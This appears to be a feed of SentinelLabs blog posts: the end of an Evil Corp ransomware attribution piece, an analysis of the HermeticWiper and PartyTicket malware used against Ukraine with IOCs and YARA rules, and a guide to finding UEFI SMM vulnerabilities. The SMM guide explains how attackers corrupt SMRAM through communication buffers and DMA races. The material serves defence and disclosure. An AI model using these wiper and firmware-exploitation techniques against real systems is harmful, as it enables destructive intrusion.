Our analysis shows that it is likely Evil Corp started being a customer of the CryptOne service from March 2020. From March to May 2020 we found WastedLocker, gozi_rm3 (version:3.00 build:854) and Dridex (10121) samples were all packed and compiled in the same timeframe using the same CryptOne stub signature(InterfacE).

For a limited period of time between May 2020 and August 2020, we observed different versions of CryptOne overlaps.

CryptOne overlaps between May 2020 and August 2020

It seems that from a specific point in time, around September 2020, Hades, PhoenixLocker and PayloadBIN started adopting a specific CryptOne stub identified by the signature:


From December 2020, the CryptOne version ‘111111111’ appeared in the wild without any overlap.


Clustering Evil Corp activity is demonstrably difficult considering that the group has changed TTPs several times in order to bypass sanctions and stay under the radar. This is in addition to the overall trend of actors receding back into secrecy. In this research, we connect the dots in the Evil Corp ecosystem, cluster Evil Corp malware, document the group’s activities and provide insight into their TTPs.

SentinelLabs assesses with high confidence that WastedLocker, Hades, PhoenixLocker, Macaw Locker and PayloadBIN belong to the same cluster. Our assessment is based on code similarity and reuse, timeline consistency and nearly identical TTPs across the ransomware families indicating there is a consistent modus operandi for the cluster. In addition, we assess that there is a likely evolutionary link between WastedLocker and BitPaymer, and suggest that it can be attributed to the same Evil Corp activity cluster.

We fully expect that Evil Corp will continue to evolve and target organizations. In addition, we assess it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and misleading attribution. SentinelLabs will continue tracking this activity cluster to provide insight into its evolution.

In-depth technical analysis, Indicators of Compromise and further technical references are available in the full report.

Read the Full Report

HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine

24 February 2022 at 05:40

This post was updated Feb 28th 2022 to include new IOCs and the PartyTicket ‘decoy ransomware’.

Executive Summary

  • On February 23rd, the threat intelligence community began observing a new wiper malware sample circulating in Ukrainian organizations.
  • Our analysis shows a signed driver is being used to deploy a wiper that targets Windows devices, manipulating the MBR resulting in subsequent boot failure.
  • This blog includes the technical details of the wiper, dubbed HermeticWiper, and includes IOCs to allow organizations to stay protected from this attack.
  • This sample is actively being used against Ukrainian organizations, and this blog will be updated as more information becomes available.
  • We also analyze a ‘ransomware’, called PartyTicket, reportedly used as a decoy during wiping operations.
  • SentinelOne customers are protected from this threat, no action is needed.


On February 23rd, our friends at Symantec and ESET research tweeted hashes associated with a wiper attack in Ukraine, including one which is not publicly available as of this writing.

We started analyzing this new wiper malware, calling it ‘HermeticWiper’ in reference to the digital certificate used to sign the sample. The digital certificate is issued under the company name ‘Hermetica Digital Ltd’ and valid as of April 2021. At this time, we haven’t seen any legitimate files signed with this certificate. It’s possible that the attackers used a shell company or appropriated a defunct company to issue this digital certificate.

HermeticWiper Digital Signature

This is an early effort to analyze the first available sample of HermeticWiper. We recognize that the situation on the ground in Ukraine is evolving rapidly and hope that we can contribute our small part to the collective analysis effort.

Technical Analysis

At first glance, HermeticWiper appears to be a custom-written application with very few standard functions. The malware sample is 114KBs in size and roughly 70% of that is composed of resources. The developers are using a tried and tested technique of wiper malware, abusing a benign partition management driver, in order to carry out the more damaging components of their attacks. Both the Lazarus Group (Destover) and APT33 (Shamoon) took advantage of Eldos Rawdisk in order to get direct userland access to the filesystem without calling Windows APIs. HermeticWiper uses a similar technique by abusing a different driver, empntdrv.sys.

HermeticWiper resources containing EaseUS Partition Manager drivers

The copies of the driver are ms-compressed resources. The malware deploys one of these depending on the OS version, bitness, and SysWow64 redirection.

EaseUS driver resource selection

The benign EaseUS driver is abused to do a fair share of the heavy-lifting when it comes to accessing Physical Drives directly as well as getting partition information. This adds to the difficulty of analyzing HermeticWiper, as a lot of functionality is deferred to DeviceIoControl calls with specific IOCTLs.

MBR and Partition Corruption

HermeticWiper enumerates a range of Physical Drives multiple times, from 0-100. For each Physical Drive, the \\.\EPMNTDRV\ device is called for a device number.

The malware then focuses on corrupting the first 512 bytes, the Master Boot Record (MBR) for every Physical Drive. While that should be enough for the device not to boot again, HermeticWiper proceeds to enumerate the partitions for all possible drives.

They then differentiate between FAT and NTFS partitions. In the case of a FAT partition, the malware calls the same ‘bit fiddler’ to corrupt the partition. For NTFS, the HermeticWiper parses the Master File Table before calling this same bit fiddling function again.

MFT parsing and bit fiddling calls

We euphemistically refer to the bit fiddling function in the interest of brevity. Looking through it, we see calls to Windows APIs to acquire a cryptographic context provider and generate random bytes. It’s likely this is being used for an inlined crypto implementation and byte overwriting, but the mechanism isn’t entirely clear at this time.

Further functionality refers to interesting MFT fields ($bitmap, $logfile) and NTFS streams ($DATA, $I30, $INDEX_ALLOCATION). The malware also enumerates common folders (‘My Documents’, ‘Desktop’, ‘AppData’), makes references to the registry (‘ntuser’), and Windows Event Logs ("\\\\?\\C:\\Windows\\System32\\winevt\\Logs"). Our analysis is ongoing to determine how this functionality is being used, but it is clear that having already corrupted the MBR and partitions for all drives, the victim system should be inoperable by this point of the execution.

Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\CurrentControlSet\Control\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts.

Disabling CrashDumps via the registry

Finally, the malware waits on sleeping threads before initiating a system shutdown, finalizing the malware’s devastating effect.

A Decoy Ransomware – PartyTicket

On February 24th, 2022, Symantec researchers pointed to a new Go ransomware being used as a decoy alongside the deployment of HermeticWiper. During out analysis we decided to name it PartyTicket based on some of the strings used by the malware developers:

The idea of using a ransomware as a decoy for a wiper is counterintuitive. In particular, a ransomware as poorly coded as PartyTicket is more likely to tie up resources during the execution of an otherwise efficient wiper.

As often happens to amateur Go developers, the malware has poor control over its concurrent threads and the commands it attempts to run. This leads to hundreds of threads and events spawned in our consoles. That is to say, it’s a very loud and ineffective ransomware that should fire alerts left and right.

The folder organization and function naming conventions within the binary show the developer’s intent for taunting the U.S. Government and the Biden administration.

Project folders and function names referring to the Biden Administration

Similar taunting can be found in the ransom note after execution:

In trying to understand the execution flow of PartyTicket, we see the 403forBiden.wHiteHousE.primaryElectionProcess() function recursively enumerating folders:

PartyTicket looping over non-system folders

The resulting number of folders will be used as an upperbound for concurrent threads, a mistake by the Go devs as that effectively ties up all of the system’s resources. While the files found are all queued into a channel for the threads to reference.

PartyTicket generating concurrent threads

The function indirectly called for each thread is main.subscribeNewPartyMember(). It in turn takes a filename, makes a copy with a <UUID>.exe name and deletes the original file. Then we expect a second loop to relieve that queue of files and run each through a standard Go AES crypto implementation. However, execution is unlikely to get this far with the current design of PartyTicket.

(Thanks to Joakim Kennedy (Intezer) for pointing out this indirect call)

Crypto routine for files queued in the ‘salary’ channel

Overall our analysis of PartyTicket indicates it to be a rather simple, poorly coded, and loud malware. Its possible role as a decoy ransomware deployed alongside HermeticWiper is more likely to be effective for its accidental hogging of the victim organization’s system resources rather than the encryption of files itself. IOCs and Yara rules have been added below.


After a week of defacements and increasing DDoS attacks, the proliferation of sabotage operations through wiper malware is an expected and regrettable escalation. At this time, we have a very small sliver of aperture into the attacks in Ukraine and subsequent spillover into neighboring countries and allies. If there’s a silver lining to such a difficult situation, it’s seeing the open collaboration between threat intel research teams, independent researchers, and journalists looking to get the story straight. Our thanks to the researchers at Symantec, ESET, Stairwell, and RedCanary among others who’ve contributed samples, time, and expertise.

SentinelOne Customers Protected

Indicators of Compromise

(Updated February 28th, 2022)

ms-compressed resources SHA1
RCDATA_DRV_X64 5ceebaf1cbb0c10b95f7edd458804a646c6f215e
RCDATA_DRV_X86 0231721ef4e4519ec776ff7d1f25c937545ce9f4
RCDATA_DRV_XP_X64 9c2e465e8dfdfc1c0c472e0a34a7614d796294af
RCDATA_DRV_XP_X86 ee764632adedf6bb4cf4075a20b4f6a79b8f94c0
HermeticWiper SHA1
Win32 EXE 0d8cc992f279ec45e8b8dfd05a700ff1f0437f29
Win32 EXE 61b25d11392172e587d8da3045812a66c3385451
Win32 EXE 912342f1c840a42f6b74132f8a7c4ffe7d40fb77
Win32 EXE 9518e4ae0862ae871cf9fb634b50b07c66a2c379
Win32 EXE d9a3596af0463797df4ff25b7999184946e3bfa2
PartyTicket SHA-1
Win32 EXE f32d791ec9e6385a91b45942c230f52aff1626df

YARA Rules


import "pe"

      desc = "Hermetic Wiper - broad hunting rule"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "02.23.2022"
      hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
      reference = ""
        $string1 = "DRV_XP_X64" wide ascii nocase
        $string2 = "EPMNTDRV\\%u" wide ascii nocase
        $string3 = "PhysicalDrive%u" wide ascii nocase
        $cert1 = "Hermetica Digital Ltd" wide ascii nocase
      uint16(0) == 0x5A4D and
      all of them

      desc = "PartyTicket / HermeticRansom Golang Ransomware - associated with HermeticWiper campaign"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "02.24.2022"
      hash = "4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382"
      reference = ""
        $string1 = "/403forBiden/" wide ascii nocase
        $string2 = "/wHiteHousE/" wide ascii 
        $string3 = "vote_result." wide ascii
        $string4 = "partyTicket." wide ascii
        $buildid1 = "Go build ID: \"qb0H7AdWAYDzfMA1J80B/nJ9FF8fupJl4qnE4WvA5/PWkwEJfKUrRbYN59_Jba/2o0VIyvqINFbLsDsFyL2\"" wide ascii
        $project1 = "C:/projects/403forBiden/wHiteHousE/" wide ascii
      uint16(0) == 0x5A4D and
      (2 of ($string*) or 
        any of ($buildid*) or 
        any of ($project*))

      desc = "Hermetica Cert - broad hunting rule based on the certificate used in HermeticWiper and HermeticWizard"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "03.01.2022"
      hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
      reference = ""
      uint16(0) == 0x5a4d and
      for any i in (0 .. pe.number_of_signatures) : (
         pe.signatures[i].issuer contains "DigiCert EV Code Signing CA" and
         pe.signatures[i].serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec"

      desc = "Issac Wiper - broad hunting rule"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "03.01.2022"
      hash = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
      reference = ""
        $name1 = "Cleaner.dll" wide ascii
        $name2 = "cl.exe" wide ascii nocase
        $name3 = "cl64.dll" wide ascii nocase
        $name4 = "cld.dll" wide ascii nocase
        $name5 = "cll.dll" wide ascii nocase
        $name6 = "Cleaner.exe" wide ascii
        $export = "[email protected]" wide ascii
      uint16(0) == 0x5A4D and
      (any of ($name*) and $export)

      desc = "HermeticWizard hunting rule"
      author = "Hegel @ SentinelLabs"
      version = "1.0"
      last_modified = "03.01.2022"
      reference = ""
        $name1 = "Wizard.dll" wide ascii
        $name2 = "romance.dll" wide ascii
        $name3 = "exec_32.dll" wide ascii
        $function1 = "DNSGetCacheDataTable" wide ascii
        $function2 = "GetIpNetTable" wide ascii
        $function3 = "WNetOpenEnumW" wide ascii
        $function4 = "NetServerEnum" wide ascii
        $function5 = "GetTcpTable" wide ascii
        $function6 = "GetAdaptersAddresses" wide ascii
        $function7 = "GetEnvironmentStrings" wide ascii
        $ip_anchor1 = "" wide ascii
      uint16(0) == 0x5A4D and
      (any of ($function*) and any of ($name*) and $ip_anchor1)

SentinelOne STAR Rules

EventType = "Process Creation" AND TgtProcPublisher = "HERMETICA DIGITAL LTD"  AND
( SrcProcSignedStatus = "signed" AND IndicatorPersistenceCount = "2"  AND RegistryValue = "4" AND RegistryKeyPath = "MACHINE\SYSTEM\ControlSet001\Services\VSS\Start" ) AND SrcProcImagePath !~ "devsetup64.exe"

Zen and the Art of SMM Bug Hunting | Finding, Mitigating and Detecting UEFI Vulnerabilities

3 March 2022 at 16:51

It’s been almost a full year since we published the last part of our UEFI blog posts series. During that period, the firmware security community has been was more active than ever and produced several high-quality publications. Notable examples include the discovery of new UEFI implants such as MoonBounce and ESPecter, and the recent disclosure of no less than 23 high-severity BIOS vulnerabilities by Binarly.

Here at SentinelOne, we haven’t been sitting idle either. In the past year, we tried our hand at hunting down and exploiting SMM vulnerabilities. After spending several months doing so, we noticed some repetitive anti-patterns in SMM code and developed a pretty good intuition regarding the potential exploitability of bugs. Eventually, we managed to conclude 2021 after having disclosed 13 such vulnerabilities, affecting most of the well-known OEMs in the industry. In addition, several more vulnerabilities are still moving through the responsible disclosure pipeline and should go public soon.

In this blog post, we would like to share the knowledge, tools, and methods we developed to help uncover these SMM vulnerabilities. We hope that by the time you finish reading this article, you too will be able to find such firmware vulnerabilities yourselves. Please note that this article assumes a solid knowledge of SMM terminology and internals, so if your memory needs a refresher we highly recommend reading the articles in the Further Reading section before proceeding. And now, let’s get started.

Classes of SMM Vulnerabilities

While in theory SMM code is isolated from the outside world, in reality, there are many circumstances in which non-SMM code can trigger and even affect code running inside SMM. Because SMM has a complex architecture with lots of “moving parts” in it, the attack surface is pretty vast and contains among other things data passed in communication buffers, NVRAM variables, DMA-capable devices, and so on.

In the following section, we will go through some of the more common SMM security vulnerabilities. For each vulnerability type, we will provide a brief description, some recommended mitigations as well as a strategy for detecting it while reversing. Note that the list of vulnerabilities is not exhaustive and contains only vulnerabilities that are specific to the SMM environment. For that reason, it will not include more generic bugs such as stack overflows and double-frees.

SMM Callouts

The most basic SMM vulnerability class is known as an “SMM callout”. This occurs whenever SMM code calls a function located outside of the SMRAM boundaries (as defined by the SMRRs). The most common callout scenario is an SMI handler that tries to invoke a UEFI boot service or runtime service as part of its operation. Attackers with OS-level privileges can modify the physical pages where these services live prior to triggering the SMI, thus hijacking the privileged execution flow once the affected service is called.

Figure 1 – Schematic overview of an SMM callout, source: CanSecWest 2015


Besides the obvious approach of not writing such faulty code in the first place, SMM callouts can also be mitigated at the hardware level. Starting from the 4th generation of the Core microarchitecture (Haswell) Intel CPUs support a security feature called SMM_Code_Chk_En. If this security feature is turned on, the CPU is prohibited from executing any code located outside the SMRAM region once it enters SMM. One can think of this feature as the SMM equivalent of Supervisor Mode Execution Prevention (SMEP).

Querying for the status of this mitigation can be done by executing the smm_code_chk module from CHIPSEC.

Figure 2 – Using chipsec to query for the hardware mitigation against SMM callouts


Static detection of SMM callouts is pretty straightforward. Given an SMM binary, we should analyze it while looking for SMI handlers that have some execution flow that leads to calling a UEFI boot or runtime service. This way, the problem of finding SMM callouts is reduced to the problem of searching the call graph for certain paths. Luckily for us, no additional effort is required at all since this heuristic is already implemented by the excellent efiXplorer IDA plugin.

As we mentioned in previous posts in the series, efiXplorer is a one-stop-shop and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming SMI handlers
  • Locating and renaming UEFI boot/runtime services
  • Recent versions of efiXplorer use the Hex-Rays decompiler to improve analysis. One such feature is the ability to assign the correct type to interface pointers passed to methods such as LocateProtocol() or its SMM counterpart SmmLocateProtocol().

A note to Ghidra users: We also want to add that the Ghidra plugin efiSeek takes care of all the changes in the list above. However, it doesn’t include the UI elements like the protocols window and the vulnerability detection capabilities offered by efiXplorer.

After analysis of the input file is complete, efiXplorer will move on to inspect all calls carried out by SMI handlers, which yields a curated listing of potential callouts:

Figure 3 – Callouts found by efiXplorer
Figure 4 – sub_7F8 is reachable from an SMI handler but still calls a boot service located outside of SMRAM

For the most part, this heuristic works great, but we’ve encountered several edge cases where it might generate some false positives as well. The most common one is caused due to the usage of EFI_SMM_RUNTIME_SERVICES_TABLE. This is a UEFI configuration table that exposes the exact same functionality as the standard EFI_RUNTIME_SERVICES_TABLE, with the only significant difference being that, unlike its “standard” counterpart, it resides in SMRAM and is therefore suitable to be consumed by SMI handlers. Many SMM binaries often re-map the global RuntimeServices pointer to the SMM-specific implementation after completing some boilerplate initialization tasks:

Figure 5 – Remapping the global RuntimeService pointer to the SMM-compatible implementation

Calling runtime services via the re-mapped pointer yields a situation that appears to be a callout at first glance, though a closer examination will prove otherwise. To overcome this, analysts should always search the SMM binary for the GUID identifying EFI_SMM_RUNTIME_SERVICES_TABLE. If this GUID is found, chances are that most of the callouts involving UEFI runtime services are false positives. This does not apply to callouts involving boot services, though.

Figure 6 – A false positive caused by calling GetVariable() via the re-mapped RuntimeService pointer

Another source of potential false positives is various wrapper functions which are “dual-mode”, meaning they can be called from both SMM and non-SMM contexts. Internally, these functions dispatch a call to an SMM service if the caller is executing in SMM, and dispatches a call to the equivalent boot/runtime service otherwise. The most common example we’ve seen in the wild is FreePool() from EDK2, which calls gSmst->SmmFreePool() if the buffer to be freed resides in SMRAM, or calls gBs->FreePool() otherwise.

Figure 7 – The FreePool() utility functions from EDK2 is a common source of false positives

As this example demonstrates, bug hunters should be aware of the fact that static code analysis techniques are having a hard time determining that certain code paths won’t be executed in practice, and as such are likely to flag this as a callout. Some tips and tricks for identifying this function in compiled binaries will be conveyed in the Identifying Library Functions section.

Low SMRAM Corruption


Under normal circumstances, the communication buffer used to pass arguments to the SMI handler must not overlap with SMRAM. The rationale for this restriction is quite simple: if that wasn’t the case, any time the SMI handler would write some data into the comm buffer — for example, in order to return a status code to the caller — it would also modify some portion of SMRAM along the way, which is undesirable.

Figure 8 – This situation should not occur

In EDK2, the function responsible for checking whether or not a given buffer overlaps with SMRAM is called SmmIsBufferOutsideSmmValid(). This function gets called on the communication buffer upon each SMI invocation in order to enforce this restriction.

Figure 9 – EDK2 forbids the comm buffer from overlapping with SMRAM

Alas, since the size of the communication buffer is also under the attacker’s control this check on its own is not enough to guarantee sound protection and some additional responsibilities lay on the shoulders of the firmware developers. As we will see shortly, many SMI handlers fail here and leave a gap attackers can exploit to violate this restriction and corrupt the bottom portion of SMRAM. To understand how, let’s take a closer look at a concrete example:

Figure 10 – A vulnerable SMI handler

Above we have a real-life, very simple SMI handler. We can divide its operation into 4 discrete steps:

  1. Sanity checking the arguments.
  2. Reading the value of the MSR_IDT_MCR5 register into a local variable.
  3. Computing a 64-bit value out of it, then writing the result back to the communication buffer.
  4. Return to the caller.

The astute reader might be aware of the fact that during step 3, an 8-byte value is written to the Comm Buffer, but nowhere during step 1 does the code check for the prerequisite that the buffer is at least 8 bytes long. Because this check is omitted, an attacker can exploit this by:

  1. Placing the Comm Buffer in a memory location as adjacent as possible to the base of SMRAM (say SMRAM – 1).
  2. Set the size of the Comm Buffer to a small enough integer value, say 1 byte.
  3. Trigger the vulnerable SMI. Schematically, the memory layout would look as follows:
Figure 11 – Memory layout at the time of SMI invocation

As far as SmmEntryPoint is concerned, the Comm Buffer is just 1 byte long and does not overlap with SMRAM. Because of that, SmmIsBufferOutsideSmmValid() will succeed and the actual SMI handler will be called. During step 3, the handler will blindly write a QWORD value into the Comm Buffer, and by doing so it will unintentionally write over the lower 7 bytes of SMRAM as well.

Figure 12 – Memory layout at the time of corruption

Based on EDK2, the bottom portion of TSEG (the de-facto standard location for SMRAM), contains a structure of type SMM_S3_RESUME_STATE whose job is to control recovery from the S3 sleep state. As can be seen below, this structure contains a plethora of members and function pointers whose corruption can benefit the attacker.

Figure 13 – Definition for the SMM_S3_RESUME_STATE object, source: EDK2


To mitigate this class of vulnerabilities, SMI handlers must explicitly check the size of the provided communication buffer and bailout in case the actual size differs from the expected size. This can be achieved in one of two ways:

  1. Dereferencing the provided CommBufferSize argument and then comparing it to the expected size. This method works because we already saw that SmmEntryPoint calls SmmIsBufferOutsideSmmValid(CommBuffer, *CommBufferSize), which guarantees *CommBufferSize bytes of the buffer are located outside of SMRAM.

    Figure 14 – Mitigating low SMRAM corruption can be achieved simply by checking the CommBufferSize argument

  2. Calling SmmIsBufferOutsideSmmValid() on the Comm Buffer again, this time with the concrete size expected by the handler.


To detect this class of vulnerabilities, we should be looking for SMI handlers that don’t properly check the size of the Comm Buffer. That suggests the handler does not perform any of the following:

  1. Dereferences the CommBufferSize argument.
  2. Calls SmmIsBufferOutsideSmmValid() on the communication buffer.

Condition 1 is straightforward to check because efiXplorer already takes care of locating SMI handlers and assigning them their correct function prototype. Condition 2 is also easy to validate, but the crux is this: since SmmIsBufferOutsideSmmValid() is statically linked to the code, we must be able to identify it in the compiled binary. Some tips and tricks for doing so can be found in the next section.

Arbitrary SMRAM Corruption


While certainly a big step forward in our analysis of SMM vulnerabilities, the previous bug class still suffers from several significant limitations that hinder it from being easily exploited in real-life scenarios. A better, more powerful exploitation primitive will allow us to corrupt arbitrary locations within SMRAM, not only those that are adjacent to the bottom.

Such exploitation primitives can often be found in SMI handlers whose communication buffers contain nested pointers. Since the internal layout of the communication buffer is not known apriori, it is the responsibility of the SMI handler itself to correctly parse and sanitize it, which usually boils down to calling SmmIsBufferOutsideSmmValid() on nested pointers and bailing out if one of them happens to overlap with SMRAM. A textbook example for properly checking these conditions can be found in the SmmLockBox driver from EDK2:

Figure 15 – the sub-handler for SmmLockBoxSave sanitizes nested pointers

To report back to the OS that certain best practices have been implemented in SMM, a modern UEFI firmware usually creates and populates an ACPI table called the Windows SMM Mitigations Table, or WSMT for short. Among other things, the WSMT maintains a flag called COMM_BUFFER_NESTED_PTR_PROTECTION that, if present, asserts that no nested pointers are used by SMI handlers without prior sanitization. This table can be dumped and parsed using the chipsec module common.wsmt:

Figure 16 – Using CHIPSEC to dump and parse the contents of the WSMT table

Unfortunately, practice has shown that more often than not, the correlation between reported mitigations and reality is scarce at best. Even when the WSMT is present and reports all the supported mitigations as active, it’s not uncommon to discover SMM drivers that completely forget to sanitize the communication buffer. Leveraging this, attackers can trigger the vulnerable SMI with a nested pointer pointing to SMRAM memory. Depending on the nature of the particular handler, this can result in either corruption of the specified address or disclosure of sensitive information read from that address. Let’s take a look at an example.

Figure 17 – An SMI handler that does not sanitize nested pointers, leaving it vulnerable to memory corruption attacks

In the snippet above, we have an SMI handler that gets some arguments via the communication buffer. Based on the decompiled pseudocode, we can deduce that the first byte of the buffer is interpreted as an OpCode field that instructs the handler what it should do next (1). As can be seen (2), valid values for this field are either 0, 2, or 3. If the actual value differs from those, the default clause (3) will be executed. In this clause, an error code is written to the memory location pointed to by the 2nd field of the comm buffer. Since this field is under the attacker’s control along with the entire contents of the communication buffer, he or she can set it up as follows prior to triggering the SMI:

Figure 18 – Contents of the communication buffer that lead to SMRAM corruption

As the handler executes, the value of the OpCode field will force it to fall back into the default clause, while the address field will be selected in advance by the attacker depending on the exact portion of SMRAM he or she wants to corrupt.


To mitigate this class of vulnerabilities, the SMI handler must sanitize any pointer value passed in the communication buffer prior to using it. The pointer validation can be performed in one of two ways:

  • Calling SmmIsBufferOutsideSmmValid(): As was already mentioned, SmmIsBufferOutsideSmmValid() is a utility function provided by EDK2 that checks whether or not a given buffer overlaps with SMRAM. Using it is the recommended way to sanitize external input pointers.
  • Alternatively, some UEFI implementations based on the AMI codebase don’t use SmmIsBufferOutsideSmmValid(), but rather expose a similar functionality via a dedicated protocol called AMI_SMM_BUFFER_VALIDATION_PROTOCOL. Besides the semantic differences of calling a function versus utilizing a UEFI protocol, both approaches work roughly the same. Please check out the next section to learn how to correctly import this protocol definition into IDA.


The basic idea to detect this class of vulnerabilities is to look for SMI handlers that don’t call SmmIsBufferOutsideSmmValid() or utilize the equivalent AMI_SMM_BUFFER_VALIDATION_PROTOCOL. However, some edge cases must also be taken into consideration. Failing to do so might introduce unwanted false positives or false negatives.

  1. Calling SmmIsBufferOutsideSmmValid() on the comm buffer itself: this merely guarantees that the comm buffer does not overlap with SMRAM (see Low SMRAM corruption below), but it says nothing about the nested pointers. As a result, when trying to assess the robustness of a handler against rouge pointer values, these cases should not be taken into consideration.
  2. Not using nested pointers at all: Some SMI handlers might not call SmmIsBufferOutsideSmmValid() simply because the communication buffer does not hold any nested pointers, but rather other data types such as integers, boolean flags, etc. To distinguish between this benign case from the vulnerable case, we must be able to figure out the internal layout of the communication buffer.

    While this can be done manually as part of the reverse engineering process, fortunately for us, nowadays automatic type reconstruction is far from being science fiction, and various tools for doing so are readily available as off-the-shelf solutions. The two most prominent and successful IDA plugins in this category are HexRaysPyTools and HexRaysCodeXplorer. Using any of these tools lets you transform raw pointer access notation such as the following:

    Figure 20 – SMI handler using the raw CommBuffer

    Into a more friendly and comprehensible point-to-member notation:

    Figure 21 – SMI handler using the reconstructed CommBuffer

    Even more importantly, these plugins keep track of how individual fields are being accessed. Based on the access pattern, they are fully capable of reconstructing the layout of the containing structure. This includes extrapolating the number of members, their respective sizes, types, attributes, and so on. When applied to the Comm Buffer, this method lets you quickly discover if it holds any nested pointers.

    Figure 22 – The reconstructed CommBuffer as extrapolated by HexRaysCodeXplorer. Notice this structure holds two members which are nested pointers

TOCTOU attacks


Sometimes, even calling SmmIsBufferOutsideSmmValid() on nested pointers is not enough to make an SMI handler fully secure. The reason for this is that SMM was not designed with concurrency in mind and as a result, it suffers from some inherent race conditions, the most prominent one being TOCTOU attacks against the communication buffer. Because the comm buffer itself resides outside of SMRAM, its contents can change while the SMI handler is executing. This fact has serious security implications as it means double-fetches from it won’t necessarily yield the same values.

In an attempt to remedy this, SMM in multiprocessing environments follows what’s known as an “SMI rendezvous”. In a nutshell, once a CPU enters SMM a dedicated software preamble will send an Inter-Processor-Interrupt (IPI) to all other processors in the system. This IPI will cause them to enter SMM as well and wait there for the SMI to complete. Only then can the first processor safely call the handler function to actually service the SMI.

This scheme is highly effective in preventing other processors from meddling with the communication buffer while it is being used, but of course, CPUs are not the only entities that have access to the memory bus. As any OS 101 course teaches you, nowadays many hardware devices are capable of acting as DMA agents, meaning they can read/write memory without going through the CPU at all. These are great news performance-wise but are terribly bad news as far as firmware security is concerned.

Figure 23 – DMA-aware hardware can modify the contents of the comm buffer while an SMI is executing, source: Dell Firmware Security

To see how DMA operations can assist exploitation, let’s take a look at the following snippet taken from a real-life SMI handler:

Figure 24 – SMI handler that is vulnerable to a TOCTOU attack

As can be seen, this handler references a nested pointer that we named field_18 in at least 3 different locations:

  1. First, its value is retrieved from the comm buffer and saved into a local variable in SMRAM.
  2. Then, SmmIsBufferOutsideSmmValid() is called on the local variable to make sure it does not overlap SMRAM.
  3. If deemed safe, the nested pointer is re-read from the comm buffer and then passed to CopyMem() as the destination argument.

As was mentioned earlier, nothing guarantees consecutive reads from the comm buffer will necessarily yield the same value. That means an attacker can issue this SMI with the pointer referencing a perfectly safe location outside of SMRAM:

Figure 25 – Initial layout of the communication buffer at the time of issuing the SMI

However, right after the SMI validates the nested pointer and just before it is being fetched again, there exists a small window of opportunity where a DMA attack can modify its value to point somewhere else. Knowing that the pointer will soon be passed to CopyMem(), the attacker could make it point to an address in SMRAM he wants to corrupt.

Figure 26 – A malicious DMA device can modify the pointer inside the CommBuffer to point somewhere else, potentially to SMRAM memory


If configured properly by the firmware, SMRAM should be shielded from tampering by DMA devices. To make sure that’s the case on your machine, run the smm_dma module from CHIPSEC.

Figure 27 – Checking that SMRAM is protected from DMA attacks

Because of that, mitigating TOCTOU vulnerabilities can be performed merely by copying data from the communication buffer into local variables that reside in SMRAM. Like always, a good reference for the proper coding style is EDK2:

Figure 28 – Copying data from the comm buffer into local variables in SMRAM, source: SmmLockBox.c

Once all the required pieces of data are copied into SMRAM that way, DMA attacks won’t be able to influence the execution flow of SMI handlers:

Figure 29 – If configured properly, SMRAM should be protected from tampering by DMA devices


Detecting TOCTOU vulnerabilities in SMI handlers requires reconstructing the internal layout of the communication buffer, then counting how many times each field is being fetched. If the same field is being fetched twice or more by the same execution flow, chances are the respective handler is susceptible to such attacks. The severity of these issues greatly depends on the types of individual fields, with pointer fields being the most acute ones. Again, properly reconstructing the structure of the Comm Buffer greatly helps in assessing the potential risk.

CSEG-only Aware Handlers


As was mentioned by previous posts in the series, the de-facto standard location for SMRAM memory is the “Top Memory Segment”, often abbreviated as TSEG. Still, on many machines, a separate SMRAM region called CSEG (Compatibility Segment) co-exists with TSEG for compatibility reasons. Unlike TSEG whose location in physical memory can be programmed by the BIOS, the location of the CSEG region is fixed to the address range 0xA0000-0xBFFFF. Some legacy SMI handlers were designed with only CSEG in mind, a fact that can be abused by attackers. Below is an example of one such handler:

Figure 30 – An SMI handler with some CSEG-specific protections

Unlike the handlers we reviewed so far, this SMI handler does not get its arguments via the communication buffer. Instead, it uses the EFI_SMM_CPU_PROTOCOL to read registers from the SMM save state, created automatically by the CPU upon entering SMM. Therefore, the potential attack surface in this example is not the communication buffer, but rather the general-purpose registers of the CPU, whose values can be set almost arbitrarily prior to issuing the SMI.

The handler goes as follows:

  1. First, it reads the values of the ES and EBX registers from the save state.
  2. Then, it computes a linear address from them using the formula: 16 * ES + (EBX & 0xFFFF).
  3. Finally, it checks that the computed address does not fall within the bounds of CSEG. If the address is considered safe, it is passed as an argument to the function at 0x3020.

Note that the handler essentially re-implements common utility functions such as SmmIsBufferOutsideSmmValid(), only it does so in a poor way that completely neglects SMRAM segments other than CSEG. Theoretically, attackers can set the ES and BX registers such that the computed linear address will point to some other SMRAM region such as TSEG and will surely pass the safety checks imposed by the handler.

In practice, however, chances are this vulnerability is not realistically exploitable. The reason for this is that the maximal linear address we can reach is limited to 16 * 0xFFFF + 0xFFFF == 0x10FFEF, and experience shows that TSEG is usually located at much higher addresses. Nevertheless, it is a good thing to be aware of such handlers and the danger they impose.


Mitigating these vulnerabilities is entirely up to the developers of the SMI handler.


A good strategy to pinpoint these cases is to look for SMI handlers that make use of “magic numbers” that reference some unique characteristics of CSEG. These include immediate values such as 0xA0000 (the physical base address of CSEG), 0x1FFFF (its size), and 0xBFFFF (last addressable byte). Based on our experience, a function that uses two or more of these values is likely to have some CSEG-specific behavior and must be examined carefully to assess its potential risk.

SetVariable() Information Disclosure


